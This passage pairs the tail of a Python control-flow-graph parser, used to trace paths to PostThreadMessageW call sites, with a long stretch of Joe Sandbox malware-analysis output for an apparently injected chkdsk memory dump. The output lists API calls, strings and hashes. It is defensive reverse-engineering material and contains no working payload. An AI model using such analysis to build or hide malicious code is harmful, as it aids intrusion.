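            lo, _, hi = tokens[i + 1].partition("-")
            cur = Block(int(tok), int(lo, 16), int(hi, 16) if hi else int(lo, 16))
            blocks[cur.node] = cur
            i += 1
        elif cur is None:
            raise ValueError(f"label token {tok!r} before any block")
        elif tok == "call":
            cur.calls.append(int(tokens[i + 1], 16))   # internal call target, hex
            i += 1
        else:
            cur.apis.append(tok)                        # resolved API name
        i += 1
    return Cfg(blocks, edges)


def entry_block(cfg: Cfg) -> int:
    """Node with no incoming edge; the lowest address wins if there are several."""
    targets = {dst for _, dst in cfg.edges}
    roots = [b for n, b in cfg.blocks.items() if n not in targets]
    if not roots:
        raise ValueError("graph has no entry block")
    return min(roots, key=lambda b: b.start).node


def blocks_calling(cfg: Cfg, api: str) -> list:
    """Node ids of every block whose label names the given API."""
    return sorted(b.node for b in cfg.blocks.values() if api in b.apis)


def paths_to(cfg: Cfg, target: int) -> list:
    """All loop-free paths from the entry block to `target`, as node-id lists."""
    succ = {}
    for src, dst in cfg.edges:
        succ.setdefault(src, []).append(dst)
    found = []

    def walk(node, path):
        if node == target:
            found.append(path)
            return
        for nxt in succ.get(node, []):
            if nxt not in path:        # do not re-enter a block already on the path
                walk(nxt, path + [nxt])

    start = entry_block(cfg)
    walk(start, [start])
    return found


def describe(cfg: Cfg) -> list:
    """One human-readable line per block, in address order."""
    lines = []
    for b in sorted(cfg.blocks.values(), key=lambda b: b.start):
        rng = f"{b.start:x}" if b.start == b.end else f"{b.start:x}-{b.end:x}"
        parts = [f"{b.node}: {rng}"] + [f"call {t:x}" for t in b.calls] + b.apis
        lines.append(", ".join(parts))
    return lines


if __name__ == "__main__":
    cfg = parse_cfg(CFG_TEXT)
    print("\n".join(describe(cfg)))
    for node in blocks_calling(cfg, "PostThreadMessageW"):
        for path in paths_to(cfg, node):
            print("PostThreadMessageW reachable via", " -> ".join(map(str, path)))
```

The same parser handles the first graph on this page (node ids 312 to 324) when its line is passed to parse_cfg instead. For the graph embedded above, both PostThreadMessageW blocks (336 and 339) are reached only through block 328, which in turn is entered either directly from the entry block 327 or via 329 after its call to dbe20; that is the kind of fact worth recording when deciding which of the report's call sites to hook or breakpoint.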

                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CF040,?,?,00000000), ref: 000D91AC
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: b1636710406d8e5d97e47a6dc296f3b50e83a72bb60230d145072509fb5d1aa6
                                  • Instruction ID: 4504f2530c409f57e058e4a5ad3fb6a977fdc0cb40b4a7624e8ce663dd87964f
                                  • Opcode Fuzzy Hash: b1636710406d8e5d97e47a6dc296f3b50e83a72bb60230d145072509fb5d1aa6
                                  • Instruction Fuzzy Hash: 3341AB72600706ABD368DF74CC85FE7B3A9BF84704F40461AF52AA7281DB70B9108BB4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000CAD52
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                  • Instruction ID: b7b57f6f0c56207bf5655a6f28997d43d4c9fa61c559dc5210e0758bf2357931
                                  • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                  • Instruction Fuzzy Hash: 7C0171B5E4020DABDF10DBE0DC42FDDB3B89B54308F00419AE90997242F630EB04CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000DA6F4
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 4b77f1525b28765462c36f99d34f845a7569516c4df3b0827f5949d92dde93ae
                                  • Instruction ID: 2c0f4235f2b3b47069d7ace7c83b62c579003701924860a3085a8e4f5316ead2
                                  • Opcode Fuzzy Hash: 4b77f1525b28765462c36f99d34f845a7569516c4df3b0827f5949d92dde93ae
                                  • Instruction Fuzzy Hash: 6D01F2B6204149AFCB04CF98DC81EEB77A9AF8C314F158658FA5DD7202C634E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000DA6F4
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction ID: 12ded99a47d463587204f8a01ccbcc03bcc57d71ded89eb5fe2477f4f2e219ef
                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction Fuzzy Hash: FF01AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000CAD52
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: e90e30740199396d57f7cd7bed67e18ce7eee6ee49a4a5d75ff6d29f11778ce5
                                  • Instruction ID: 78d0969de327f7a62b7284b23ce9e6f7027b1412787a4235c0d4c2282a2adb6e
                                  • Opcode Fuzzy Hash: e90e30740199396d57f7cd7bed67e18ce7eee6ee49a4a5d75ff6d29f11778ce5
                                  • Instruction Fuzzy Hash: FBF0A475E0020DABDF10DBD0D882FDDB3B89B04308F008195ED1D9B641F630DA04CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CF040,?,?,00000000), ref: 000D91AC
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: cd9894b84da853ed4e4ffa8c984e8b48326dd570691f743a48a256f5fb526518
                                  • Instruction ID: 88e22c89fa935fccf694ed0fe68e85282f5b55bf415e9c03c5387f482bb39dc0
                                  • Opcode Fuzzy Hash: cd9894b84da853ed4e4ffa8c984e8b48326dd570691f743a48a256f5fb526518
                                  • Instruction Fuzzy Hash: 5FE06D373803043AE2206599AC02FE7B39C9B91B20F140026FA0DEB2C2D595F80142A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CF1C2,000CF1C2,?,00000000,?,?), ref: 000DA7C0
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 32e4e15a0b1546b6ed6cfc41be5bc789452a4d7225925380914faeb8848f2d95
                                  • Instruction ID: f806b41a8bc44a73204b210df7feb425319f51699341f8c4e11beaac781b4e93
                                  • Opcode Fuzzy Hash: 32e4e15a0b1546b6ed6cfc41be5bc789452a4d7225925380914faeb8848f2d95
                                  • Instruction Fuzzy Hash: 5AF0A9B13002446BEB14EF54CC89FEB3BA8EF8A310F108094FD4C9B242C530A9048BB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CF1C2,000CF1C2,?,00000000,?,?), ref: 000DA7C0
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction ID: 332dd4e50441459a5c10ce514c5a395e5d791108a8eaaf12587d23c39c3c0ad7
                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction Fuzzy Hash: EAE01AB12002086BDB10DF89DC85FE737ADEF89650F018165BA0857242C930E8108BF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,000C8D14,?), ref: 000CF6EB
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: f3ec0066757ec37bb7ec88ea7e7a61a6bb591fb13afd8a3df758eb188ee319d9
                                  • Instruction ID: f8289f20b06f20729938d8a06a35e3a57224adbff28449134dcb697811786aa3
                                  • Opcode Fuzzy Hash: f3ec0066757ec37bb7ec88ea7e7a61a6bb591fb13afd8a3df758eb188ee319d9
                                  • Instruction Fuzzy Hash: 73E0C2396502002BE700EBB8DC02FE927C6AF60740F080124F54CD72D3D924D4018521
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,000C8D14,?), ref: 000CF6EB
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                  • Instruction ID: 26417fe2b8fe0716a21403320dd44a94a0a1db6131fd23e3614bbafcaa1a65ad
                                  • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                  • Instruction Fuzzy Hash: C2D052666903083BEA10BAA8DC03F6A33C9AB44B00F490078FA48AB3C3E964E4008166
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  • Kernel-MUI-Language-Disallowed, xrefs: 02038914
                                  • Kernel-MUI-Language-Allowed, xrefs: 02038827
                                  • Kernel-MUI-Language-SKU, xrefs: 020389FC
                                  • Kernel-MUI-Number-Allowed, xrefs: 020387E6
                                  • WindowsExcludedProcs, xrefs: 020387C1
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: _wcspbrk
                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                  • API String ID: 402402107-258546922
                                  • Opcode ID: 220af9dffb8b71e02ea1044d4038cb14ad62283b91d6ac558327d92ba2d25c9d
                                  • Instruction ID: d3fa861c5e0989116f3b5c90b61432265d8531d3a5d1d95dbe3b97c12f747737
                                  • Opcode Fuzzy Hash: 220af9dffb8b71e02ea1044d4038cb14ad62283b91d6ac558327d92ba2d25c9d
                                  • Instruction Fuzzy Hash: C6F1D8B2D00309EFDB52EF95C9849EEB7B9FF08304F1484AAE505A7610E7359A45EF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: _wcsnlen
                                  • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                  • API String ID: 3628947076-1387797911
                                  • Opcode ID: c752ee82e69e79b3cf91da07497f3acfcb6081d5f8477a3e1bc9bd188f2a3dba
                                  • Instruction ID: 39e2360f2ad58e5be6c72fed957c94e5ab5741903f5c0e430ec721952e9aac73
                                  • Opcode Fuzzy Hash: c752ee82e69e79b3cf91da07497f3acfcb6081d5f8477a3e1bc9bd188f2a3dba
                                  • Instruction Fuzzy Hash: ED41A476240309BEF7019AE0CC91FEEBBADEF05748F508512BA05DA190D7B0DB50ABA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: c06d7c27a27a8f641a57613f46af04256d82f6cf885b58f8ba79e3ad825a4c81
                                  • Instruction ID: 97722e717ae53d560ea444c639343a0f6ac596132ee6a1584e1933865dbe5e22
                                  • Opcode Fuzzy Hash: c06d7c27a27a8f641a57613f46af04256d82f6cf885b58f8ba79e3ad825a4c81
                                  • Instruction Fuzzy Hash: 0F6111B1D00765AACF25CF59C890ABFBBF6EF84300B54C06DE89A47540D734A640EF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 2236606f810f037509420e961ca9c33eb2cedb7523ab1834fc373f41618d45f8
                                  • Instruction ID: 6a2c382cf85125cda1ed487876d4f29ea119444b70a29ea5baba0f512a7e6fbf
                                  • Opcode Fuzzy Hash: 2236606f810f037509420e961ca9c33eb2cedb7523ab1834fc373f41618d45f8
                                  • Instruction Fuzzy Hash: 0161A4B1900748EADB76DF99C8405FEBBF5EF54211B24C5A9F8A997100E334EA81EB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02063F12
                                  Strings
                                  • ExecuteOptions, xrefs: 02063F04
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0206E2FB
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02063F75
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02063EC4
                                  • Execute=1, xrefs: 02063F5E
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 0206E345
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02063F4A
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: BaseDataModuleQuery
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 3901378454-484625025
                                  • Opcode ID: 851debc423b6fc4c1e14590dbde3c9847f005ebe1cba7aaef5bde6aed9561a75
                                  • Instruction ID: fbec9f60c3235ad1c63b8beb6ac3a45ecc0f40cfa0e4cbd0b4e94f342935b9d5
                                  • Opcode Fuzzy Hash: 851debc423b6fc4c1e14590dbde3c9847f005ebe1cba7aaef5bde6aed9561a75
                                  • Instruction Fuzzy Hash: 5141DA7168071C7EEB21DB94DCC9FEBB3FDAF14704F0045A9A905E6090EB709A45AFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: __fassign
                                  • String ID: .$:$:
                                  • API String ID: 3965848254-2308638275
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02072206
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-4236105082
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ___swprintf_l.LIBCMT ref: 0207EA22
                                    • Part of subcall function 020513CB: ___swprintf_l.LIBCMT ref: 0205146B
                                    • Part of subcall function 020513CB: ___swprintf_l.LIBCMT ref: 02051490
                                  • ___swprintf_l.LIBCMT ref: 0205156D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020722F4
                                  Strings
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 020722FC
                                  • RTL: Re-Waiting, xrefs: 02072328
                                  • RTL: Resource at %p, xrefs: 0207230B
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-871070163
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0207248D
                                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 020724BD
                                  • RTL: Re-Waiting, xrefs: 020724FA
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                  • API String ID: 0-3177188983
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: __fassign
                                  • String ID:
                                  • API String ID: 3965848254-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: $$0
                                  • API String ID: 1302938615-389342756
                                  Uniqueness

                                  Uniqueness Score: -1.00%